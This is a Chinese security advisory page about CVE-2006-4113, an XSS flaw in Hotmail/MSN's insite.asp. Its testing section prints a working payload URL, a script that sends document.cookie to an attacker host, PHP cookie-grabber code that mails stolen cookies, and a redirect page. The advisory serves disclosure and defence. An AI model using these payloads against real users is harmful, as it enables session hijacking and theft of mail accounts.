安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Hotmail/MSN insite.asp跨站脚本执行漏洞
发布日期:
2006-08-10
更新日期:
2006-08-17
受影响系统:
Microsoft Hotmail
描述:
BUGTRAQ ID:
19436
CVE(CAN) ID:
CVE-2006-4113
Hotmail是微软提供的用于注册MSN的免费邮件系统。
Hotmail的CGI脚本实现上存在跨站脚本执行漏洞,远程攻击者可能利用此漏洞非授权访问其他用户的邮箱。
由于没有正确过滤用户输入,导致newsletter.msn.com的insite.asp脚本中存在跨站脚本漏洞。攻击者可以利用这个脚本在已认证MSN用户浏览器的环境中执行任意代码,导致窃取基于cookie的认证信息,在cookie过期之前(大约24个小时)临时访问受害用户的邮件帐号。
<*来源:Simo64 (simo64@morx[dot]org)
链接:
http://marc.theaimsgroup.com/?l=full-disclosure&m=115522061605940&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><scriptsrc=http://attacker/redir.js>
这里redir.js代码可以为:
location.href='
http://attacker-site/cookie-grabber.php?cookie='+escape(document.cookie)
cookie-grabber.php可以为:
<?
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("
your@email.org
", $subject, $msg);
header ("location:
http://attacker-site/some-pic.jpg");
?>
攻击者还可以使用html文件将受害用户重新定向至跨站脚本位置:
<meta http-equiv="refresh" content="0;
url=
http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><scriptsrc=http://attacker/redir.js>">
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本 :
http://www.microsoft.com/technet/security/
浏览次数:
3936
严重程度:
7(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客